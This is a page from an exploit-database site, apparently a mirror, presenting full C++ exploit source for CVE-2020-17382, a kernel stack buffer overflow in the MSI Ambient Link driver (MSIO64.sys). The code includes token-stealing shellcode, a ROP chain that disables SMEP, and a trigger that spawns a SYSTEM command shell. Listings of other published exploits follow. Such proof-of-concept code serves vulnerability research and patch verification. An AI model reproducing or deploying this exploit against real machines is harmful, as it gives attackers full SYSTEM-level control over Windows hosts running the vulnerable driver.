To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation"

Author

Exploit author

"Matteo Malvica"

Platform

Exploit platform

windows

Release date

Exploit published date

2020-09-28

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
/*
Exploit Title: MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation
Date: 2020-09-24
Exploit Author: Matteo Malvica
Vendor Homepage: https://www.msi.com
Software Link: https://msi.gm/ABLTMNB
Driver: MSIO64.sys
SHA256: 525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD
Version: 1.0.0.8
Tested on: Windows 10 1709 [19041.1.amd64fre.vb_release.191206-1406]
MSI Ambient Link Driver 1.0.0.8 Kernel Stack Based Buffer Overflow / Local Privilege Escalation
CVE: CVE-2020-17382
Writeup: https://www.matteomalvica.com/blog/2020/09/24/weaponizing-cve-2020-17382/
Original advisory: https://www.coresecurity.com/core-labs/advisories/msi-ambient-link-multiple-vulnerabilities
*/

#include <iostream>
#include <string>
#include <Windows.h>
#include <Psapi.h>

#pragma warning( disable : 6387 )

VOID eopMsio(HANDLE hFile, INT64 kernel_base, DWORD pid, DWORD IoControlCode) {
          // SHELLCODE FOR 1709
          BYTE token_steal[] =
          "\x65\x48\x8B\x14\x25\x88\x01\x00\x00"      // mov rdx, [gs:188h]       ; Get _ETHREAD pointer from KPCR
          "\x4C\x8B\x82\xB8\x00\x00\x00"              // mov r8, [rdx + b8h]      ; _EPROCESS (kd> u PsGetCurrentProcess)
          "\x4D\x8B\x88\xe8\x02\x00\x00"              // mov r9, [r8 + 2e8h]      ; ActiveProcessLinks list head
          "\x49\x8B\x09"                              // mov rcx, [r9]            ; Follow link to first process in list
          //find_system_proc:
          "\x48\x8B\x51\xF8"                          // mov rdx, [rcx - 8]       ; Offset from ActiveProcessLinks to UniqueProcessId
          "\x48\x83\xFA\x04"                          // cmp rdx, 4               ; Process with ID 4 is System process
          "\x74\x05"                                  // jz found_system          ; Found SYSTEM token
          "\x48\x8B\x09"                              // mov rcx, [rcx]           ; Follow _LIST_ENTRY Flink pointer
          "\xEB\xF1"                                  // jmp find_system_proc     ; Loop
          //found_system:
          "\x48\x8B\x41\x70"                          // mov rax, [rcx + 70h]     ; Offset from ActiveProcessLinks to Token
          "\x24\xF0"                                  // and al, 0f0h             ; Clear low 4 bits of _EX_FAST_REF structure
          //find cmd
          "\x48\x8B\x51\xF8"                          // mov rdx, [rcx-8]         ;ActiveProcessLinks - 8 = UniqueProcessId
          "\x48\x81\xFA\x99\x99\x00\x00"              // cmp rdx, 0d54h           ;UniqueProcessId == ZZZZ? (PLACEHOLDER)
          "\x74\x05"                                  // jz found_cmd             ;YES - move on
          "\x48\x8B\x09"                              // mov rcx, [rcx]           ;NO - next entry in list
          "\xEB\xEE"                                  // jmp find_cmd             ;loop
          // found cmd
          "\x48\x89\x41\x70"                          // mov [rcx+70h], rax       ;copy SYSTEM token over top of this process's token
          "\x48\x31\xc9"                              // xor rcx rcx              ; clear some registers to avoid issues while unwinding the call stack
          "\x48\x31\xc0"                              // xor rax rax
          "\x48\x31\xf6"                              // xor rsi,rsi
          "\x48\x31\xff"                              // xor rdi, rdi
          "\x4D\x31\xC0"                              // xor r8, r8
          "\x48\xc7\xc1\xf8\x06\x15\x00"              // mov rcx, 0x1506f8        ; move original cr4 value into rcx
          "\xc3";                                     // ret                      ; RET

    token_steal[54] = pid;
    token_steal[55] = pid >> 8;

    LPVOID allocated_shellcode = VirtualAlloc(NULL,
        sizeof(token_steal),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    memcpy(allocated_shellcode, token_steal, sizeof(token_steal));

    INT64 pop_rcx_offset = kernel_base + 0x15fc70;            // gadget 1 1709 - pop rcx ; ret
    INT64 mov_cr4_offset = kernel_base + 0x76a02;             // gadget 2 1709 - mov cr4, ecx ; ret
    INT64 wbindv_offset = kernel_base + 0x1175c0;;            // gadget 3 1709 - wbinvd; ret
    INT64 rcx_value = 0x506f8;                                // value we want placed in cr4 in order to disable SMEP
    INT64 rcx_old_value = 0x1506f8;                           // original cr4 value         
    INT64 ret = pop_rcx_offset + 1;                           // RET NOP

    puts("[+] SMEP disabled");
    
    BYTE  input_buff[136] = { 0 };
    memset(input_buff, '\x41', 64);
    memset(input_buff, '\x42', 8);                            // dummy RBP
    memcpy(input_buff + 72, (PINT64)&pop_rcx_offset, 8);      // pop rcx
    memcpy(input_buff + 80, (PINT64)&rcx_value, 8);           // disable SMEP value
    memcpy(input_buff + 88, (PINT64)&mov_cr4_offset, 8);      // mov cr4, rcx
    memcpy(input_buff + 96, (PINT64)&wbindv_offset, 8);       // wbinvd; ret
    memcpy(input_buff + 104, (PINT64)&allocated_shellcode, 8);// shellcode
    memcpy(input_buff + 112, (PINT64)&mov_cr4_offset, 8);     // mov cr4, rcx 
    memcpy(input_buff + 120, (PINT64)&ret, 8);                // RETNOP to restore the stack
    memcpy(input_buff + 128, (PINT64)&ret, 8);                // RETNOP to restore the stack

    printf("[+] Payload buffer located at: 0x%p\n", &allocated_shellcode);

    DWORD lpBytesReturned = 0x0;
    BOOL triggerIOCTL = DeviceIoControl(hFile,
        IoControlCode,
        input_buff,
        sizeof(input_buff),
        NULL,
        0,
        &lpBytesReturned,
        NULL);

    if (!triggerIOCTL) {
        printf("[!] DeviceIoControl failed: %d\n", GetLastError());
    }
    else {
        puts("[+] SMEP re-enabled");
        puts("[+] Enjoy your SYSTEM shell\n");
    }

    system("start cmd.exe");
}

LPVOID GetBaseAddr(const char* drvname) {
    LPVOID drivers[1024];
    DWORD cbNeeded;
    int nDrivers, i = 0;

    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
        char szDrivers[1024];
        nDrivers = cbNeeded / sizeof(drivers[0]);
        for (i = 0; i < nDrivers; i++) {
            if (GetDeviceDriverBaseNameA(drivers[i], (LPSTR)szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
                if (strcmp(szDrivers, drvname) == 0) {
                    return drivers[i];
                }
            }
        }
    }
    return 0;
}

HANDLE GetDriverHandle() {
    HANDLE hMsio;

    hMsio = CreateFileA("\\\\.\\MsIo",
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hMsio == INVALID_HANDLE_VALUE) {
        printf("[-] Error obtaining an handle to the driver: %d\n", GetLastError());
        exit(1);
    }

    return hMsio;
}

int main() {
    puts("[*] CVE-2020-17382 - Win10 1709 - PoC by Matteo 'uf0' Malvica");
    DWORD IoControlCode = 0x80102040;
    HANDLE hDevice = GetDriverHandle();
    INT64 nt = (INT64)GetBaseAddr("ntoskrnl.exe");
    DWORD pid = GetCurrentProcessId();

    eopMsio(hDevice, nt, pid, IoControlCode);

    return 0;
}
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-09-28 "MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation" local windows "Matteo Malvica"
2020-05-22 "Druva inSync Windows Client 6.6.3 - Local Privilege Escalation" local windows "Matteo Malvica"
2019-03-04 "Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)" webapps windows "Matteo Malvica"
2019-02-21 "RealTerm Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow (SEH)" local windows "Matteo Malvica"
2019-02-06 "River Past Audio Converter 7.7.16 - Buffer Overflow (SEH)" local windows "Matteo Malvica"
2019-01-28 "CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)" remote windows_x86-64 "Matteo Malvica"
2018-12-21 "AnyBurn 4.3 - Local Buffer Overflow (SEH)" local windows "Matteo Malvica"
2018-10-09 "Free MP3 CD Ripper 2.8 - '.wma' Buffer Overflow (SEH) (DEP Bypass)" local windows_x86-64 "Matteo Malvica"
2018-08-27 "CuteFTP 5.0 - Buffer Overflow" local windows_x86 "Matteo Malvica"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48836/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.